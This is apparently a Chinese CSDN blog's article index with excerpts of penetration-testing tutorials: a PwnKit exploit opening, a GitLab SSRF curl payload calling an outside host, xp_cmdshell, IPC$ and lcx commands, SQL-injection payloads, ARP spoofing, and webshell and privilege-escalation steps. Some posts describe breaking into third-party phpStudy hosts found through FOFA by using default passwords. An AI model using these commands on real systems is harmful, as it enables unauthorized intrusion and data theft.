![](https://img-blog.csdnimg.cn/20201014180756913.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
笔记
内蒙古打野
这个作者很懒,什么都没留下…
展开
-
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
Linux Polkit权限提升漏洞 CVE-2021-4034漏洞描述Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。漏洞影响Polkit > 2009漏洞复现from ctypes import *from ctypes.util import find_libraryimpo原创 2022-01-26 16:53:37 · 7531 阅读 · 0 评论 -
CVE-2021-42287/CVE-2021-42278利用
CVE-2021-42287/CVE-2021-42278利用地址:https://github.com/cube0x0/noPac原创 2021-12-20 11:25:28 · 692 阅读 · 0 评论 -
kali 安装pip命令
安装pip3curl -s https://bootstrap.pypa.io/get-pip.py | python3安装pip2curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py | python检测安装pip -V原创 2021-12-17 11:45:03 · 892 阅读 · 0 评论 -
DOS查找Windows远程桌面的端口
DOS查找Windows远程桌面的端口方法一查看是否开启了远程桌面服务:net start | findstr "Terminal Services"如果Windows打开了远程桌面,可以先查看远程桌面:tasklist /svc | findstr "TermService"svchost.exe 2140 TermServiceTermService是远程桌面的服务名称,2140是它的进程PID我们可以查找PID就可以找到远程桌面的端口了:端口是3389!方法二regedit计算原创 2021-12-15 15:20:30 · 1846 阅读 · 0 评论 -
CVE-2021-22214 Gitlab_SSRF
CVE-2021-22214 Gitlab_SSRF漏洞复现:目标地址:https://gitlab.xxx.xxx/users/sign_inPOCcurl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://fbnw原创 2021-12-15 10:58:50 · 2697 阅读 · 0 评论 -
心脏滴血(CVE-2014-0160)
心脏滴血(CVE-2014-0160)漏洞范围:OpenSSL1.0.1版本漏洞成因:Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。漏洞危害:如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的私钥,用户cookie和密码等。漏洞复现:原创 2021-12-15 10:55:00 · 3369 阅读 · 0 评论 -
扫描.DS_Store好用的工具
扫描.DS_Store好用的工具直接pip install dumpalldunpall -u http://xxx.com原创 2021-12-14 17:00:49 · 877 阅读 · 0 评论 -
MySQL udf提权
MySQL udf提权UDF提权这个利用还是不太常见的,因为在mysql5.1版本以后对注册的UDF的位置有了限制,而在默认的是没有\lib\plugin文件夹的,一般需要root用户修改。什么是UDFUDF就是User Defined Function,用户自定义函数,即通过用户添加的函数来对MySQL的功能进行补偿怎么使用UDF我的mysql版本:5.7.26,所以我的是默认没有plugin这个目录的查看secure_file_priv的指secure_file_priv是用来限制load原创 2021-12-02 16:20:11 · 924 阅读 · 0 评论 -
锐捷RG-UAC统一上网行为管理审计系统账号密码 CNVD-2021-14536信息泄露漏洞
文章目录一、漏洞描述:二、影响版本:三、漏洞复现:四、漏洞POC:一、漏洞描述:锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台。二、影响版本:锐捷RG-UAC统一上网行为管理审计系统三、漏洞复现:FOFA语句:title="RG-UAC登录页面"来到登录页面:按F12查看源码,可以发现账号和密码的md5形式,解密md5得到密码后即可登录系统:四、漏洞POC:# -*- coding: utf-8 -*-import reques转载 2021-04-30 11:02:25 · 610 阅读 · 0 评论 -
内网渗透思维建立
一、内网渗透思维建立前置什么是内网?什么是内网IP?0x01 内网渗透思路脑图0x02 信息收集,获取权限0x03 判断获取到的机器的类型前置什么是内网?内网一般指局域网,是一种私有网络。内网的计算机与Internet上的其他计算机不一定完全互通。什么是内网IP?不太严谨,但是简单的判断方法,适用于大多数情况。内网IP有三种:第一种:10.0.0.0 ~ 10.255.255.255第二种:172.16.0.0 ~ 172.31.255.255第三种:192.168.0.0 ~ 192.原创 2021-04-30 10:50:24 · 208 阅读 · 0 评论 -
利用python实现自定义线程目录爆破工具
利用python实现自定义线程目录爆破工具利用python实现自定义线程目录爆破工具:# 1. 输入目标url和线程大小# 2. 以队列的形式获取要爆破的路径# 3. 定义路径获取函数get_path()# 4. 利用多线程进行url目录爆破# 5. 定义目录爆破函数get_url()import urllib3import queueimport threadingimport sysimport timedef main(url, threadNum): # 2.原创 2021-03-15 17:05:55 · 435 阅读 · 0 评论 -
用python实现arp欺骗,详细步骤及思路
用python实现arp欺骗,详细步骤及思路用python实现arp欺骗,详细步骤及思路:# 1. 从命令行获取要欺骗的IP# 2. 获取IP对应的MAC地址# 3. 定义MAC获取函数get_mac()# 4. 启动ARP欺骗# 5. 定义ARP欺骗函数# 6. 嗅探数据包# 7. 定义cookie嗅探函数# 8. 恢复靶机ARP缓存# 9. 定义ARP缓存恢复函数from scapy.all import *import timefrom threading import T原创 2021-03-15 17:03:18 · 1792 阅读 · 0 评论 -
正则表达式模式:
正则表达式模式:正则表达式模式:^ 匹配字符串的开头$ 匹配字符串的末尾。. 匹配任意字符,除了换行符,当re.DOTALL标记被指定时,则可以匹配包括换行符的任意字符。[...] 用来表示一组字符,单独列出:[amk] 匹配 'a','m'或'k'[^...] 不在[]中的字符:[^abc] 匹配除了a,b,c之外的字符。re* 匹配0个或多个的表达式。re+ 匹配1个或多个的表达式。re? 匹配0个或1个由前面的正则表达式定义的片段,非贪婪方式re{ n} 匹配n个前面表达式。例如,原创 2021-03-15 17:01:19 · 242 阅读 · 0 评论 -
利用python进行多线程网站title爬取
利用python进行多线程网站title爬取:代码如下:import requestsimport reimport csvimport threadingimport urllib3import queueimport sysurllib3.disable_warnings()def main(): url_list = get_path(file="url_list.txt") threads = [] for i in range(30):原创 2021-03-15 16:59:38 · 318 阅读 · 0 评论 -
利用python脚本实现 存活url 检测
利用python脚本实现 存活url 检测:代码如下:from threading import Threadfrom queue import Queueimport requestsclass UrlCheck(Thread): def __init__(self, url_queue, url_list): super().__init__() self.url_queue = url_queue # 要探测的url队列 self原创 2021-03-15 16:57:27 · 1379 阅读 · 2 评论 -
CEV-2018-11759访问控制绕过原理和复现(实战)
原理:Apache Web服务器(httpd)特定的代码在将请求的路径与Apache Tomcat JK (mod_jk)连接器1.2.0到1.2.44中的URI-工作器映射进行匹配之前对其进行了规范化,但没有正确处理某些边缘情况。如果只有Tomcat支持的网址子集通过httpd公开,那么一个特殊构造的请求就有可能通过反向代理公开应用程序的功能,而该反向代理不是为通过反向代理访问应用程序的客户端设计的。在某些配置中,特殊构造的请求也可能绕过httpd中配置的访问控制。影响版本:Apache mod_j原创 2020-10-29 16:54:53 · 717 阅读 · 0 评论 -
ctf supersqli
堆叠注入正常访问如下在1后门加 ‘ 报错 可能存在注入:order by 测试猜测字段 发现有两个:union select 1,2查询回显,发现select、where等字符被过滤:尝试堆叠注入 =1’ ;show databases;–+ 发现能够回显库名:继续堆叠注入 =1’;show tables;–+堆叠注入爆出列名 =1’;show columns from words;–+没有敏感信息:堆叠注入查询1919810931114514表中所有列=1’;sho原创 2020-10-28 20:14:32 · 329 阅读 · 0 评论 -
一个弱口令拿下shell(实战)
前期准备1.首先信息收集一波确认目标,:fofa: body=“phpstudy探针” && title=“phpStudy 探针 2014”2.找几个心仪的目标下手,打开的页面是这样的:正文1.记住这个绝对路径,后面用得上,然后页面拉到最后,使用弱口令对MySQL数据库连接进行检测。一般phpstudy默认配置的mysql账号密码为root/root,直接使用这个去尝试登录:2.但是这种命中率五五开吧,这个不行,就换一个吧,毕竟这个测试,开头还是需要弱口令进去,或者自己也可原创 2020-10-28 17:15:59 · 605 阅读 · 0 评论 -
lcx端口转发实现3389远程桌面访问
1.上传一句话php一句话:2.菜刀连接成功以后上传lcx.exe3.上传成功后打开虚拟终端--------写入命令lcx.exe -slave 本机IP 自定义端口 目标IP 端口例如:lcx.exe -slave 192.168.1.2 6666 192.168.1.250 3389lcx -listen 6666 3388 本地自定义端口4.监听成功,端口号为1234 ,使用127.0.0.1:1234连接5.登录远程桌面:...原创 2020-10-25 10:44:56 · 783 阅读 · 0 评论 -
ipc的简单使用
ipc的使用在自己的win7虚拟机上开始实验,IP地址为192.168.174.128,PC机与虚拟机互通:net use \ip\ipc$ “” /user:"" //尝试建立IPC空连接net use \ip\c$ “123456” /user:“yyt” //建立IPC连接copy X:\文件名 \IP地址\c$net time \IP //查询目标主机时间at \IP地址 时间 X:\x.exe //设定目标文件启动时间sc \ip config t原创 2020-10-25 10:39:52 · 390 阅读 · 0 评论 -
时间注入的一些基本思路
时间注入的一些基本思路原理利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息1,判断当前库名的长度语法:and if (length(database())=x,0,sleep(5))#0 //判断数据库名字长度实例:http://10.6.18.36/time/?type=1 and if (length(database())>11,0,sleep(5))#0当前库名长度为122,猜库名语法:and if (ascii(substr原创 2020-10-24 13:55:06 · 773 阅读 · 0 评论 -
弱口令登录phpmyadmin拿到webshell开启3389登录远程桌面(实战)
前期准备首先信息收集一波确认目标,:fofa: body=“phpstudy探针” && title=“phpStudy 探针 2014”找几个心仪的目标下手,打开的页面是这样的正文记住这个绝对路径,后面用得上,然后页面拉到最后,使用弱口令对MySQL数据库连接进行检测。一般phpstudy默认配置的mysql账号密码为root/root,直接使用这个去尝试登录但是这种命中率五五开吧,这个不行,就换一个吧,毕竟这个测试,开头还是需要弱口令进去,或者自己也可以跑字典做其他的尝试原创 2020-10-23 14:41:20 · 2396 阅读 · 0 评论 -
Cobalt strike 派生shell给MSF
Cobalt strike 派生shell给MSF,前提是要有beaconshell:在msf使用监听模块,并设置相关选项:use exploit/multi/handleset payload windows/meterpreter/reverse_httpset lhost 10.6.18.56set lport 4321run -j回到Cobalt strike中添加监听器payload为 windows/foreign/reverse_httpc,ip为msf的ip监听端口为msf监原创 2020-10-22 20:05:19 · 471 阅读 · 0 评论 -
mssql数据库提权(xp_cmdshell)
mssql数据库提权(xp_cmdshell)利用 xp_cmdshell 存储过程代码:EXEC master.dbo.xp_cmdshell ‘ipconfig’开启xp_cmdshellexec sp_configure ‘show advanced options’, 1;reconfigure;exec sp_configure ‘xp_cmdshell’,1;reconfigure;关闭xp_cmdshellexec sp_configure ‘show advanced opt原创 2020-10-22 16:06:16 · 918 阅读 · 0 评论 -
利用cobaltstrike加sqlmap拿下一个网站并提权
利用cobaltstrike加sqlmap拿下一个网站并提权Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe原创 2020-10-21 20:41:45 · 1187 阅读 · 1 评论 -
总结一些渗透测试中信息收集思路
总结一些渗透测试中信息收集思路一次渗透测试中,信息收集往往是至关重要的,信息收集的好坏,决定了你渗透测试的好坏。下面我们来聊聊渗透测试中信息收集的一些方法与思路。1.获取域名的whois信息,获取注册者邮箱姓名电话等;2.识别WAF:waf00f或者自己手动尝试一些非法字符,为了之后的一系列扫描做准备,防止ip因为快扫被封;3.nslookup查看一下dns解析,直接访问ip,查看是否存在cdn;4.dirsearch扫描目录,有waf最好设置一下delay,1秒2秒都可,访问一下扫出来的敏感目录原创 2020-10-18 18:11:23 · 832 阅读 · 1 评论 -
Xray的快速使用
快速使用使用基础爬虫爬取并扫描整个网站xray webscan --basic-crawler http://example.com --html-output crawler.html使用 HTTP 代理进行被动扫描xray webscan --listen 127.0.0.1:7777 --html-output proxy.html设置浏览器 http 代理为 http://127.0.0.1:7777,就可以自动分析代理流量并扫描。如需扫描 https 流量,请阅读下方文档 抓取 htt原创 2020-10-18 13:18:54 · 2048 阅读 · 0 评论 -
sql注入的小工具介绍
sql注入的小工具介绍啊D注入工具:pangolin(穿山甲)穿山甲;Pangolin(中文译名为穿山甲)一款帮助渗透测试人员进行Sql注入测试的安全工具,是深圳宇造诺赛科技有限公司(Nosec)旗下的网站安全测试产品之一。sqlmapSQLMAP;sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Acce原创 2020-10-18 12:51:42 · 975 阅读 · 0 评论 -
整理关于sql手工的注入(Access、MSSQL、MySQL、cookie注入、时间注入、头注入)
什么是SQL注入?开发人员在开发Web系统时对输入的数据没有进行有效的验证及过滤,就存在引发SQL注入漏洞的可能并导致查看、插入、删除数据库的数据,甚至可以执行主机的系统命令。SQL注入容易出现在哪些地方?①URL动态传值,如:asp?id=1②留言板③搜索框④登录框…这些在使用时,要与数据库进行交互的地方。下面介绍一下sql注入中的手工注入常见的测试方法:1)单引号测试:’2)and 1=1、and 1=2 条件测试先解释下and 1=1 和and 1=2;and 是SQL原创 2020-10-18 12:42:48 · 2428 阅读 · 0 评论 -
利用webshell反弹提权
利用php大马反弹进行提权准备工具:php大马一个NC.exePHP大马反弹连接—选择windows–自定义端口nc.exe -vv -l -p 4444原创 2020-10-18 11:25:33 · 387 阅读 · 0 评论 -
利用FlashFXP提权的一些思路
FlashFXP是一个功能强大的 FXP/FTP 软件,支持彩色文字显示;像 BpFTP 支持多文件夹选择文件,能够缓存文件夹;支持上传、下载及第三方文件续传;可以跳过指定的文件类型,只传送 需要的文件;可以自定义不同文件类型的显示颜色;可以缓存远端文件夹列表,支持FTP代理具有避免空闲功能,防止被站点踢出的功能。提权思路:利用FlashFXP替换文件漏洞,可以读取管理员链接过的站点账号密码。思路扩展:通过社会工程学猜测其他的密码同样如此,借此机会扩大权限利用webshell,进到FlashFXP原创 2020-10-18 11:23:01 · 196 阅读 · 0 评论 -
利用Serv-u提权的简单思路
利用Serv-u提权Serv-u提权提权分两种:有修改权限(可写权限)无权限修改(不可写权限)安装目录找到serv u的ServUDaemon.ini这个文件(该文件时储存密码的),然后将密码丢到shell里面去,然后进行serv-u提权,一般管理员并不修改serv-u的密码1.先判断服务器中是否安装了serv-userv-u的默认端口是43958 可以用nmap 扫描确认判断是否有写入权限:一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini进入到原创 2020-10-18 11:13:54 · 2068 阅读 · 0 评论 -
PR、巴西烤肉、iis6.0提权复现
PR、巴西烤肉、iis6.0提权复现大多数的时候,如果我们上传了一句话木马之后,想要进一步操作。比如,创建新用户,查看当前身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限,对其他目录和系统都没有权限,这时我们就需要提权了。受影响系统:Microsoft Windows XP x64 SP2Microsoft Windows XP x64Microsoft Windows XP SP3Microsoft Windows XP SP2Microsoft Windows S原创 2020-10-18 11:01:54 · 1167 阅读 · 0 评论 -
ewebeditor编辑器漏洞连接大马复现
ewebeditor编辑器漏洞连接大马复现eWebEditor是一个基于浏览器的在线HTML编辑器,WEB开发人员可以用它把传统的多行文本输入框“textarea”替换为可视化的富文本输入框。1.御剑扫描81端口后发现有ewebeditor编辑器:2.找到登录窗口地址尝试登录:尝试用默认密码 admin admin 登录,发现可行;3.点击样式管理4在两个选框中加入|asp后面的限制也可以改大点,方便上传大马,点击提交:5.点击浏览,然后点击图片上传大马5.复制路径连接大马:原创 2020-10-18 10:50:54 · 518 阅读 · 0 评论 -
Kali Linux的安装简单易懂
这里写自定义目录标题Kali Linux的安装Kali Linux的安装安装Kali Linux(VMware Workstation)Linux安装的方式现如今已经非常的“傻瓜”化,只需轻点几下鼠标,就可以完成整个系统的安装过程。Kali Linux操作系统的安装也非常简单。本节介绍安装Kali Linux的详细过程。VMware Workstation是VMware公司推出的一款功能强大的桌面虚拟计算软件。此软件能够提供虚拟机功能,从而允许用户在单一的桌面上同时运行多个不同的操作系统,以及进行开原创 2020-10-18 10:41:08 · 302 阅读 · 0 评论